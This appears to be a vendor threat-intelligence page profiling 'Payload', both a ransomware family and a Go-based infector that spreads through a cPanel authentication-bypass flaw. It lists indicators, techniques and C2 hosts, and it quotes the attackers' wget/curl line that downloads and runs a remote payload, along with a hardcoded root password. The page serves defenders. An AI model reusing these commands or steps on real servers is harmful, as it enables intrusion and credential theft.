Payload
Payload refers to two distinct malware usages in the provided content. Most prominently, Payload is described as an emerging ransomware family active since at least February 2026. It targets Windows and Linux/ESXi systems, appends the .payload extension to encrypted files, and drops a ransom note named RECOVER_payload.txt. Reported capabilities include Curve25519 ECDH and ChaCha20-based per-file encryption, partial encryption of large files, encryption of local and network drives, deletion of shadow copies, clearing of Windows Event Logs, ETW patching in ntdll.dll, termination of backup, database, security, and office-related services and processes, and self-deletion via NTFS alternate data streams. The Windows variant uses the mutex MakeAmericaGreatAgain. The Linux/ESXi variant parses /etc/vmware/hostd/vmInventory.xml to locate VMware disk paths. The ransomware has been associated with leak-site activity and claimed victims across sectors including logistics, transportation, construction, real estate, manufacturing, technology, healthcare, telecom, energy, agriculture, and smaller healthcare providers and clinics. Reported observables include the SHA-256 hash 1ca67af90400ee6cbbd42175293274a0f5dc05315096cb2e214e4bfe12ffb71f for payload.exe, the SHA-256 hash 29f7f8ccd00ff392dde56ede64b5cae2f0a72dfade096de7a8e4fe1428728c37 for RECOVER_payload.txt, and Tor infrastructure including payloadrz5yw227brtbvdqpnlhq3rdcdekdnn3rgucbcdeawq2v6vuyd[.]onion and payloadynyvabjacbun4uwhmxc7yvdzorycslzmnleguxjn7glahsvqd[.]onion. Separately, the content also describes a Go-based malware installer project named Payload delivered via exploitation of CVE-2026-41940 against cPanel & WHM. That Payload implants an SSH public key, changes the root password to 123Qwe123C, deploys a PHP webshell at /usr/local/cpanel/cgi-sys/cpanel.py, injects malicious login.js and login.tmpl into the cPanel login path to steal usernames, passwords, User-Agent strings, and URLs, exfiltrates data to wrned.com, cp.dene.de.com/collect.php, and a Telegram group controlled by the attackers, and ultimately deploys a cross-platform remote-control trojan named filemanager. This activity is attributed in the content to a cluster tracked as Mr_Rot13 and is associated with infrastructure including wrned.com, cp.dene.de.com, and wpsock.com, as well as MD5 hashes fb1bc3f935fdeb3555465070ba2db33c for the Update/Payload installer, 9305b4ebbb4d39907cf36b62989a6af3 for a Linux AMD64 filemanager sample, and 2286f126ab4740ccf2595ad1fa0c615c for a related helper.php backdoor. Because the provided content uses the same name for both a ransomware family and a separate Go-based cPanel infector, the naming is ambiguous.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access... CVE-2026-41940 is an authentication bypass flaw affecting cPanel and WHM versions after 11.40. | Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
2 techniques
Execution
Persistence
5 techniques
Persistence
Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...
Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater
修该密码 & 植入SSH 公钥,对应的处理函数分别为main_changeRootPassword和main_installSSHKey... 植入SSH 公钥 ssh-ed25519 ... cpanel-updater
Privilege Escalation
4 techniques
Privilege Escalation
CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.
Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...
Stealth
4 techniques
Stealth
服务器地址 uggcf://jearq.pbz/ybt.cuc?g=3 使用ROT13编码... 该文件由2部分组成... 从 </script>*/ 之后为混淆的恶意代码。混淆方式为简单的字串xor拼接混淆... 去混淆后为 str_rot13
Defense Impairment
1 technique
Defense Impairment
Credential Access
6 techniques
Credential Access
Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.
The login.js ... steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its main functions are: implanting an SSH public key, malicious PHP, and JS code into the compromised cPanel system, stealing login credentials, sending the stolen information back to a Telegram group controlled by the attackers
Discovery
1 technique
Discovery
Collection
5 techniques
Collection
The infector collects sensitive information from the compromised system, including bash history, ssh data, device information, database passwords, Valiases configuration, etc., and sends it back to the hacker's server.
Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.
The login.js ... steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Command and Control
5 techniques
Command and Control
The attackers also used Telegram bots as a backup channel to receive stolen information.
The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
sending the stolen information back to a Telegram group controlled by the attackers
Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'
IOCs tracked for this family
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Payload is a Windows-targeting ransomware family that encrypts files and appends the .payload extension, drops a ransom note named RECOVER_payload.txt, deletes shadow copies, clears event logs, terminates backup/database/office processes and services, and uses Curve25519 ECDH with ChaCha20 for per-file encryption.
A Go-based malware infector used in attacks exploiting cPanel CVE-2026-41940. It implants SSH keys, malicious PHP and JavaScript, changes root passwords, injects webshells and login-page JavaScript, steals credentials, exfiltrates data via Telegram, and deploys the Filemanager trojan for persistent access.
A Go-based infector/downloader delivered via CVE-2026-41940 against cPanel & WHM. It changes the root password, installs an SSH public key, drops a PHP webshell, injects malicious JavaScript into the login page to steal credentials, exfiltrates host and credential data to attacker infrastructure and Telegram, and deploys the Filemanager RAT.
A Go-based infector delivered via exploitation of CVE-2026-41940. It modifies the root password, installs SSH keys, drops a PHP webshell and malicious JavaScript, steals credentials and system data, exfiltrates data to attacker infrastructure and Telegram, and deploys the Filemanager remote-control trojan.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.